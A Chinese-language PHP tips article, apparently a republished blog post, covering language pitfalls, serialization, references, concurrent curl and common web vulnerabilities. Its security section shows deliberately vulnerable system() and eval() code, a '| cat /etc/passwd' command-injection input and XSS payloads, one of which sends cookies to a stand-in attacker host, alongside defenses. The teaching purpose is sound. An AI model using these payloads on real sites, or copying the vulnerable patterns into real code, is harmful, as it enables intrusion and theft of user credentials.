使用PHP編程時(shí)需要注意哪些事項(xiàng)

使用PHP編程時(shí)需要注意哪些事項(xiàng)？相信很多沒有經(jīng)驗(yàn)的人對(duì)此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個(gè)問題。

 1、php隱性的三元操作符(?:)優(yōu)先級(jí)問題：

例1：

復(fù)制代碼 代碼如下:

    $person = $who or $person = "laruence"; 

    //實(shí)際上是等同于: 

    $person = empty($who)? "laruence" : $who; 

例2

復(fù)制代碼 代碼如下:

    $arr = array（1=>1,3=>3）； 
    $i = 2; 
    $a = 'test‘ . isset($arr[$i]) ? $arr[$i] : $i; 

$a 是什么? 這個(gè)問題, 咋一看覺得簡(jiǎn)單,

$a = ‘test2';

其實(shí)仔細(xì)推敲后運(yùn)行的，結(jié)果是notice：Undefined index 2..

由于優(yōu)先級(jí)的問題, 連接符的優(yōu)先級(jí)比三元操作符高。

首先是判斷 ' test'. isset($arr[$i]) 這個(gè)字符串永遠(yuǎn)是true，因此：

$a =  $arr[$i]；以致php提示提醒。
 

2. PHP函數(shù)名和類名不區(qū)分大小寫的，而變量名是區(qū)分大小寫的。

所以自己寫的php模塊，往往是大寫的問題，編譯不通過。

3.系列化傳遞問題

把復(fù)雜的數(shù)據(jù)類型壓縮到一個(gè)字符串中
serialize() 把變量和它們的值編碼成文本形式
unserialize() 恢復(fù)原先變量

復(fù)制代碼 代碼如下:

    $stooges = array('Moe','Larry','Curly'); 
    $new = serialize($stooges); 
    print_r($new);echo "<br />"; 
    print_r(unserialize($new)); 
    <span ></span> 

結(jié)果：a:3:{i:0;s:3:"Moe";i:1;s:5:"Larry";i:2;s:5:"Curly";}
Array ( [0] => Moe [1] => Larry [2] => Curly )
當(dāng)把這些序列化的數(shù)據(jù)放在URL中在頁面之間會(huì)傳遞時(shí)，需要對(duì)這些數(shù)據(jù)調(diào)用urlencode()，以確保在其中的URL元字符進(jìn)行處理：

復(fù)制代碼 代碼如下:

$shopping = array('Poppy seed bagel' => 2,'Plain Bagel' =>1,'Lox' =>4); 
echo '<a href="next.php?cart='.urlencode(serialize($shopping)).'">next</a>';

margic_quotes_gpc和magic_quotes_runtime配置項(xiàng)的設(shè)置會(huì)影響傳遞到unserialize()中的數(shù)據(jù)。
如果magic_quotes_gpc項(xiàng)是啟用的，那么在URL、POST變量以及cookies中傳遞的數(shù)據(jù)在反序列化之前必須用stripslashes()進(jìn)行處理：

復(fù)制代碼 代碼如下:

    $new_cart = unserialize(stripslashes($cart)); //如果magic_quotes_gpc開啟 
    $new_cart = unserialize($cart); 

如果magic_quotes_runtime是啟用的，那么在向文件中寫入序列化的數(shù)據(jù)之前必須用addslashes()進(jìn)行處理，而在讀取它們之前則必須用stripslashes()進(jìn)行處理：

復(fù)制代碼 代碼如下:

$fp = fopen('/tmp/cart','w'); 
fputs($fp,addslashes(serialize($a))); 
fclose($fp); 
//如果magic_quotes_runtime開啟 
$new_cat = unserialize(stripslashes(file_get_contents('/tmp/cart'))); 
//如果magic_quotes_runtime關(guān)閉 
$new_cat = unserialize(file_get_contents('/tmp/cart'));

在啟用了magic_quotes_runtime的情況下，從數(shù)據(jù)庫中讀取序列化的數(shù)據(jù)也必須經(jīng)過stripslashes()的處理，保存到數(shù)據(jù)庫中的序列化數(shù)據(jù)必須要經(jīng)過addslashes()的處理，以便能夠適當(dāng)?shù)卮鎯?chǔ)。

復(fù)制代碼 代碼如下:

    mysql_query("insert into cart(id,data) values(1,'".addslashes(serialize($cart))."')"); 
    $rs = mysql_query('select data from cart where id=1'); 
    $ob = mysql_fetch_object($rs); 
    //如果magic_quotes_runtime開啟 
    $new_cart = unserialize(stripslashes($ob->data)); 
    //如果magic_quotes_runtime關(guān)閉 
    $new_cart = unserialize($ob->data); 

當(dāng)對(duì)一個(gè)對(duì)象進(jìn)行反序列化操作時(shí)，PHP會(huì)自動(dòng)地調(diào)用其__wakeUp()方法。這樣就使得對(duì)象能夠重新建立起序列化時(shí)未能保留的各種狀態(tài)。例如：數(shù)據(jù)庫連接等。

4. 引用注意事項(xiàng)
PHP中引用意味著用不同的名字訪問同一個(gè)變量?jī)?nèi)容，引用不是C的指針（Ｃ語言中的指針里面存儲(chǔ)的是變量的內(nèi)容，在內(nèi)存中存放的地址），是變量的另外一個(gè)別名或者映射。注意在 PHP 中，變量名和變量?jī)?nèi)容是不一樣的，因此同樣的內(nèi)容可以有不同的名字。最接近的比喻是 Unix 的文件名和文件本身――變量名是目錄條目，而變量?jī)?nèi)容則是文件本身。引用可以被看作是 Unix 文件系統(tǒng)中的緊密連接或者wins的快捷方式。

1）unset 一個(gè)引用，只是斷開了變量名和變量?jī)?nèi)容之間的綁定。這并不意味著變量?jī)?nèi)容被銷毀了
 
例如：不會(huì) unset $b，只是 $a。

復(fù)制代碼 代碼如下:

    <?php   

         $a   =   1 ;   
         $b   =&   $a ;   
         unset  ( $a );   
         echo $b; //輸出：1: 

使用unset($a)與$a=null的結(jié)果是不一樣的。如果該塊內(nèi)存只有$a一個(gè)映射，那么unset($a)與$a=null等價(jià)，該內(nèi)存的引用計(jì)數(shù)變?yōu)?，被自動(dòng)回收；如果該塊內(nèi)存有$a和$b兩個(gè)映射，那么unset($a)將導(dǎo)致$a=null且$b不變的情況，而$a=null會(huì)導(dǎo)致$a=$b=null的情況。
原因：某變量賦值為null，將導(dǎo)致該變量對(duì)應(yīng)的內(nèi)存塊的引用計(jì)數(shù)直接置為0，被自動(dòng)回收。

2）PHP引用是采用引用計(jì)數(shù)、寫時(shí)拷貝

很多人誤解Php中的引用跟C當(dāng)中的指針一樣，事實(shí)上并非如此，而且很大差別。C語言中的指針除了在數(shù)組傳遞過程中不用顯式申明外，其他都需要使用*進(jìn)行定義，而php中對(duì)于地址的指向（類似指針）功能不是由用戶自己來實(shí)現(xiàn)的，是由Zend核心實(shí)現(xiàn)的，php中引用采用的是“引用計(jì)數(shù)、寫時(shí)拷貝”的原理，(寫時(shí)復(fù)制（Copy-on-Write，也縮寫為COW），顧名思義，就是在寫入時(shí)才真正復(fù)制一份內(nèi)存進(jìn)行修改。)

就是除非發(fā)生寫操作，指向同一個(gè)地址的變量或者對(duì)象是不會(huì)被拷貝的，比如下面的代碼：
$a = array('a','c'...'n');
$b = $a;
如果程序僅執(zhí)行到這里，$b和$b是相同的，但是并沒有像C那樣，$a和$b占用不同的內(nèi)存空間，而是指向了同一塊內(nèi)存，這就是php和c的差別，并不需要寫成$b=&$a才表示$b指向$a的內(nèi)存，zend就已經(jīng)幫你實(shí)現(xiàn)了引用，并且zend會(huì)非常智能的幫你去判斷什么時(shí)候該這樣處理，什么時(shí)候不該這樣處理。

如果在后面繼續(xù)寫如下代碼，增加一個(gè)函數(shù)，通過引用的方式傳遞參數(shù)，并打印輸出數(shù)組大小。

復(fù)制代碼 代碼如下:

    function printArray(&$arr) //引用傳遞 
     { 
        print(count($arr)); 
    } 
     printArray($a); 

上面的代碼中，我們通過引用把$a數(shù)組傳入printArray()函數(shù)，zend引擎會(huì)認(rèn)為printArray()可能會(huì)導(dǎo)致對(duì)$a的改變，此時(shí)就會(huì)自動(dòng)為$b生產(chǎn)一個(gè)$a的數(shù)據(jù)拷貝，重新申請(qǐng)一塊內(nèi)存進(jìn)行存儲(chǔ)。這就是前面提到的“引用計(jì)數(shù)、寫時(shí)拷貝”概念。

直觀的理解：$a將使用自己原始的內(nèi)存空間，而$b，則會(huì)使用新開辟的內(nèi)存空間，而這個(gè)空間將使用$a的原始（$a或者$b改變之前）內(nèi)容空間的內(nèi)容的拷貝，然后做對(duì)應(yīng)的改變。

如果我們把上面的代碼改成下面這樣：

復(fù)制代碼 代碼如下:

    function printArray($arr)  //值傳遞 
     { 
         print(count($arr)); 
     } 
     printArray($a); 

上面的代碼直接傳遞$a值到printArray()中，此時(shí)并不存在引用傳遞，所以沒有出現(xiàn)寫時(shí)拷貝。

5. 編碼的問題

程序代碼使用utf-8碼，而strlen函數(shù)是計(jì)算字符串的字節(jié)數(shù)而不是字符數(shù)？
 $str = “您好hello”;

echo strlen($str);

結(jié)果：ANSI=9 而utf-8=11，utf-8中文字符編碼是3個(gè)字節(jié)。要獲取字符數(shù)，使用mb_strlen().

6. PHP獲取參數(shù)的三種方法

方法一 使用$argc $argv

復(fù)制代碼 代碼如下:

<?php 
    if ($argc > 1){ 
        print_r($argv); 
    }

在命令行下運(yùn)行 /usr/local/php/bin/php ./getopt.php -f 123 -g 456

運(yùn)行結(jié)果：
     # /usr/local/php/bin/php ./getopt.php -f 123 -g 456
        Array
        (
            [0] => ./getopt.php
            [1] => -f
            [2] => 123
            [3] => -g
            [4] => 456
        )

方法二 使用getopt函數(shù)（）

復(fù)制代碼 代碼如下:

    $options = "f:g:"; 
    $opts = getopt( $options ); 
    print_r($opts); 

在命令行下運(yùn)行 /usr/local/php/bin/php ./getopt.php -f 123 -g 456
 運(yùn)行結(jié)果：
   Array
        (
            [f] => 123
            [g] => 456
        )

方法三 提示用戶輸入，然后獲取輸入的參數(shù)。有點(diǎn)像C語言

復(fù)制代碼 代碼如下:

fwrite(STDOUT, "Enter your name: "); 
$name = trim(fgets(STDIN)); 
fwrite(STDOUT, "Hello, $name!");

在命令行下運(yùn)行 /usr/local/php/bin/php ./getopt.php
 運(yùn)行結(jié)果
     Enter your name: francis
     Hello, francis!

7. php的字符串即可以當(dāng)做數(shù)組,和c指針字符串一樣

復(fù)制代碼 代碼如下:

    <?php 
    $s = '12345'; 
    $s[$s[0]] = 0; 
    echo $s; 
    ?> 

結(jié)果是10345

8. PHP的高效率寫法：

9. PHP的安全漏洞問題：

針對(duì)PHP的網(wǎng)站主要存在下面幾種攻擊方式：

1、命令注入(Command Injection)

     PHP中可以使用下列5個(gè)函數(shù)來執(zhí)行外部的應(yīng)用程序或函數(shù) system、exec、passthru、shell_exec、“(與shell_exec功能相同)
     如：

復(fù)制代碼 代碼如下:

    <?php 
    $dir = $_GET["dir"];  
    if (isset($dir)) {      
        echo "";      
        system("ls -al ".$dir);      
        echo "";  
    }  
    ?>  

我們提交http://www.test.com/ex1.php?dir=| cat /etc/passwd，命令變成了 system("ls -al | cat /etc/passwd"); 我們服務(wù)器用戶信息被竊看了吧。

2、eval注入(Eval Injection)

eval函數(shù)將輸入的字符串參數(shù)當(dāng)作PHP程序代碼來執(zhí)行，eval注入一般發(fā)生在攻擊者能控制輸入的字符串的時(shí)候。

復(fù)制代碼 代碼如下:

$var = "var";  
if (isset($_GET["arg"]))  
{  
    $arg = $_GET["arg"];  
    eval("\$var = $arg;");  
    echo "\$var =".$var;  
}  
?>

當(dāng)我們提交http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就產(chǎn)生了；

防范命令注入和eval注入的方法

   1）、盡量不要執(zhí)行外部命令。

   2）、使用自定義函數(shù)或函數(shù)庫來替代外部命令的功能，甚至有些服務(wù)器直接禁止使用這些函數(shù)。

   3）、使用escapeshellarg函數(shù)來處理命令參數(shù)，esacpeshellarg函數(shù)會(huì)將任何引起參數(shù)或命令結(jié)束的字符轉(zhuǎn)義，單引號(hào)“'”，替換成“\'”，雙引號(hào)“"”，替換成“\"”，分號(hào)“;”替換成“\;”

3、客戶端腳本攻擊(Script Insertion)

客戶端腳本植入的攻擊步驟

1）、攻擊者注冊(cè)普通用戶后登陸網(wǎng)站

2）、打開留言頁面，插入攻擊的js代碼

3）、其他用戶登錄網(wǎng)站（包括管理員），瀏覽此留言的內(nèi)容

4）、隱藏在留言內(nèi)容中的js代碼被執(zhí)行，攻擊成功

表單輸入一些瀏覽器可以執(zhí)行的腳本：

插入 <script>while(1){windows.open();}</script> 無限彈框

插入<script>location.href="http://www.sectop.com";</script> 跳轉(zhuǎn)釣魚頁面
 防止惡意HTML標(biāo)簽的最好辦法是使用htmlspecailchars或者h(yuǎn)tmlentities使某些字符串轉(zhuǎn)為html實(shí)體。

4、跨網(wǎng)站腳本攻擊(Cross Site Scripting, XSS)

惡意攻擊者往Web頁面里插入惡意html代碼，當(dāng)用戶瀏覽該頁之時(shí)，嵌入其中Web里面的html代碼會(huì)被執(zhí)行，從而達(dá)到惡意用戶的特殊目的。

跨站腳本主要被攻擊者利用來讀取網(wǎng)站用戶的cookies或者其他個(gè)人數(shù)據(jù)，一旦攻擊者得到這些數(shù)據(jù)，那么他就可以偽裝成此用戶來登錄網(wǎng)站，獲得此用戶的權(quán)限。

跨站腳本攻擊的一般步驟:

1）、攻擊者以某種方式發(fā)送xss的http鏈接給目標(biāo)用戶，例如評(píng)論表單：

        插入<script>document.location= “go.somewhere.bad？cookie=+“this.cookie</script>

      或者是鏈接：

      http://w w w.my.site/index.php?user=< script >document.location="http://w w w.atacker.site/get.php?cookie="+document.cookie;< / script >

2）、目標(biāo)用戶登錄此網(wǎng)站，在登陸期間打開了攻擊者發(fā)送的xss鏈接

3）、網(wǎng)站執(zhí)行了此xss攻擊腳本

4）、目標(biāo)用戶頁面跳轉(zhuǎn)到攻擊者的網(wǎng)站，攻擊者取得了目標(biāo)用戶的信息

5）、攻擊者使用目標(biāo)用戶的信息登錄網(wǎng)站，完成攻擊

      防止惡意HTML標(biāo)簽的最好辦法還是使用htmlspecailchars或者h(yuǎn)tmlentities使某些字符串轉(zhuǎn)為html實(shí)體。

5、SQL注入攻擊(SQL injection)

     SQL注入最有效的防御方式是使用準(zhǔn)備語句：

     準(zhǔn)備語句（也叫預(yù)備語句 prepared statements），是一種查詢，先將他們發(fā)送到服務(wù)器進(jìn)行預(yù)編譯和準(zhǔn)備，并且在以后的執(zhí)行這個(gè)查詢時(shí)告訴它存儲(chǔ)參數(shù)的位置。

其優(yōu)點(diǎn)：

   1）對(duì)參數(shù)值進(jìn)行轉(zhuǎn)義。因此不必調(diào)用像mysqli::real_escape_string或者將參數(shù)放在引號(hào)中。

  2）當(dāng)在一個(gè)腳本中多次執(zhí)行時(shí)，預(yù)備語句的性能通常好于每次都通過網(wǎng)絡(luò)發(fā)送查詢，當(dāng)再次執(zhí)行一個(gè)查詢時(shí)，只將參數(shù)發(fā)送到數(shù)據(jù)庫，這占用的空間比較少。

1）用PDO(PHP Data Objects )：

復(fù)制代碼 代碼如下:

PHP PDO::prepare() and execute()  

$preparedStatement = $db->prepare('INSERT INTO table (column) VALUES (:column)');   

$preparedStatement->execute(array(':column' => $unsafeValue));

2) 使用mysqli:

復(fù)制代碼 代碼如下:

    $stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');  

    $stmt->bind_param('s', $name);   

    $stmt->execute();   

    $result = $stmt->get_result();   

    while ($row = $result->fetch_assoc()) {   

        // do something with $row    

    }   

6、跨網(wǎng)站請(qǐng)求偽造攻擊(Cross Site Request Forgeries, CSRF)

7、Session 會(huì)話劫持(Session Hijacking)

8、Session 固定攻擊(Session Fixation)

9、HTTP響應(yīng)拆分攻擊(HTTP Response Splitting)

10、文件上傳漏洞(File Upload Attack)

11、目錄穿越漏洞(Directory Traversal)

12、遠(yuǎn)程文件包含攻擊(Remote Inclusion)

13、動(dòng)態(tài)函數(shù)注入攻擊(Dynamic Variable Evaluation)

14、URL攻擊(URL attack)

15、表單提交欺騙攻擊(Spoofed Form Submissions)

16、HTTP請(qǐng)求欺騙攻擊(Spoofed HTTP Requests)

幾個(gè)重要的php.ini選項(xiàng)：register_globals、、magic_quotes、safe_mode。 這個(gè)幾個(gè)選項(xiàng)在PHP5.4都將被棄用。

register_globals：

     php>=4.2.0，php.ini的register_globals選項(xiàng)的默認(rèn)值預(yù)設(shè)為Off，當(dāng)register_globals

的設(shè)定為On時(shí)，程序可以接收來自服務(wù)器的各種環(huán)境變量，包括表單提交的變量，而且由于PHP不必事先初始化變量的值，從而導(dǎo)致很大的安全隱患。

     要確保禁用 register_globals。如果啟用了 register_globals，就可能做一些粗心的事情，比如使用 $variable 替換同名的 GET 或 POST 字符串。通過禁用這個(gè)設(shè)置，PHP 強(qiáng)迫您在正確的名稱空間中引用正確的變量。要使用來自表單 POST 的變量，應(yīng)該引用 $_POST['variable']。這樣就不會(huì)將這個(gè)特定變量誤會(huì)成 cookie、會(huì)話或 GET 變量。

safe_mode：

安全模式，PHP用來限制文檔的存取、限制環(huán)境變量的存取，控制外部程序的執(zhí)行。啟用安全模式必須設(shè)置php.ini中的safe_mode=On

magic_quotes

用來讓php程序的輸入信息自動(dòng)轉(zhuǎn)義，所有的單引號(hào)(“'”)，雙引號(hào)(“"”)，反斜杠(“\”)和空字符(NULL)，都自動(dòng)被加上反斜杠進(jìn)行轉(zhuǎn)義magic_quotes_gpc=On用來設(shè)置magicquotes為On，它會(huì)影響HTTP請(qǐng)求的數(shù)據(jù)(GET、POST、Cookies)程序員也可以使用addslashes來轉(zhuǎn)義提交的HTTP 請(qǐng)求數(shù)據(jù)，或者用stripslashes 來刪除轉(zhuǎn)義。

10. curl多請(qǐng)求并發(fā)使用

curl大家一定使用過，但并發(fā)使用的情況估計(jì)不多。但在某些情況下確實(shí)比較有用，比如在同一請(qǐng)求里面調(diào)用多個(gè)他方接口，傳統(tǒng)方法我們需要串行請(qǐng)求接口:

file_get_contents('http://a.php');//1秒

file_get_contents('http://b.php');//2秒

file_get_contents('http://c.php');//2秒

那在這里耗時(shí)為5秒，但運(yùn)營(yíng)curl的muti方法，我們只需2秒就可請(qǐng)求完畢.  在php的手冊(cè)里面有一段代碼：

復(fù)制代碼 代碼如下:

    $mrc = curl_multi_init(); 
    //發(fā)出請(qǐng)求 
    ....... 
    $active = null; 
            do { 
                $mrc = curl_multi_exec($mh, $active); 
            } while ($mrc == CURLM_CALL_MULTI_PERFORM); 

            while ($active && $mrc == CURLM_OK) { 
                if (curl_multi_select($mh) != -1) { 
                    do { 
                        $mrc = curl_multi_exec($mh, $active); 
                    } while ($mrc == CURLM_CALL_MULTI_PERFORM); 
                } 
            } 
    //下面是處理請(qǐng)求返回的結(jié)果 

但如果我有1000個(gè)請(qǐng)求，那么curl批處理將并發(fā)1000個(gè)請(qǐng)求，顯然是不合理，所以應(yīng)該要控制一個(gè)并發(fā)數(shù)，并且將剩余的連接添加到請(qǐng)求隊(duì)列里：
參考：How to use curl_multi() without blocking

復(fù)制代碼 代碼如下:

    <?php 
    $connomains = array( 
        //2.php自己去些 
       "http://localhost/2.php?id=1",//sleep(1)秒 
       "http://localhost/2.php?id=2",//sleep(2)秒 
       "http://localhost/2.php?id=5",//sleep(5)秒 
    ); 

    $mh = curl_multi_init(); 

    foreach ($connomains as $i => $url) { 
      $conn[$i] = curl_init($url);//初始化各個(gè)子連接 
      curl_setopt($conn[$i], CURLOPT_RETURNTRANSFER, 1);//不直接輸出到瀏覽器 
      curl_multi_add_handle ($mh,$conn[$i]);//加入多處理句柄 
    } 

    $active = 0;//連接數(shù) 

    do { 
      do{ 
          //這里$active會(huì)被改寫成當(dāng)前未處理數(shù) 
          //全部處理成功$active會(huì)變成0 
          $mrc  = curl_multi_exec($mh, $active); 

          //這個(gè)循環(huán)的目的是盡可能的讀寫，直到無法繼續(xù)讀寫為止(返回CURLM_OK) 
          //返回(CURLM_CALL_MULTI_PERFORM)就表示還能繼續(xù)向網(wǎng)絡(luò)讀寫 
      }while($mrc==CURLM_CALL_MULTI_PERFORM); 

     
    //如果一切正常，那么我們要做一個(gè)輪詢，每隔一定時(shí)間(默認(rèn)是1秒)重新請(qǐng)求一次 
    //這就是curl_multi_select的作用,它在等待過程中，如果有就返回目前可以讀寫的句柄數(shù)量,以便 
    //繼續(xù)讀寫操作,0則沒有可以讀寫的句柄(完成了) 
    } while ($mrc==CURLM_OK&& $active &&curl_multi_select($mh)!=-1);//直到出錯(cuò)或者全部讀寫完畢 

    if ($mrc != CURLM_OK) { 
      print "Curl multi read error $mrc/n"; 
    } 

    // retrieve data 
    foreach ($connomains as $i => $url) { 
      if (($err = curl_error($conn[$i])) == '') { 
       $res[$i]=curl_multi_getcontent($conn[$i]); 
      } else { 
       print "Curl error on handle $i: $err/n"; 
      } 
      curl_multi_remove_handle($mh,$conn[$i]); 
      curl_close($conn[$i]); 
    } 
    curl_multi_close($mh); 

    print_r($res); 
    ?>  

有的人為了省事，這樣寫:

do { curl_multi_exec($mh,$active); } while ($active);

看似也能得到結(jié)果，但其實(shí)很不嚴(yán)謹(jǐn)，并且很浪費(fèi)cpu，因?yàn)檫@個(gè)循環(huán)會(huì)一直在不停的調(diào)用，直到所有鏈接處理完畢，在循環(huán)里面加個(gè)print 'a' 就可看出效果了。

11、empty使用魔術(shù)方法__get判斷對(duì)象屬性是否為空不起作用

Please note that results of empty() when called on non-existing / non-public variables of a class are a bit confusing if using magic method __get (as previously mentioned by nahpeps at gmx dot de). Consider this example:

復(fù)制代碼 代碼如下:

<?php
class Registry
{
    protected $_items = array();
    public function __set($key, $value)
    {
        $this->_items[$key] = $value;
    }
    public function __get($key)
    {
        if (isset($this->_items[$key])) {
            return $this->_items[$key];
        } else {
            return null;
        }
    }
}

$registry = new Registry();
$registry->empty = '';
$registry->notEmpty = 'not empty';

var_dump(empty($registry->notExisting)); // true, so far so good
var_dump(empty($registry->empty)); // true, so far so good
var_dump(empty($registry->notEmpty)); // true, .. say what?
$tmp = $registry->notEmpty;
var_dump(empty($tmp)); // false as expected
?>

12、Linux下命令行執(zhí)行php文件的格式必須是unix。

php ./test.php
如果test.php是windos上傳的，其格式可能是dos。
然后運(yùn)行該命令就報(bào)錯(cuò)：Could not open input file

我們可以在vi中使用:set ff來查看格式：

fileformat=dos

如果是dos格式,那么就要使用:set ff=unix來設(shè)置新格式

再使用:set ff來查看格式,可以看到已經(jīng)是unix的格式了;

fileformat=unix

看完上述內(nèi)容，你們掌握使用PHP編程時(shí)需要注意哪些事項(xiàng)的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注億速云行業(yè)資訊頻道，感謝各位的閱讀！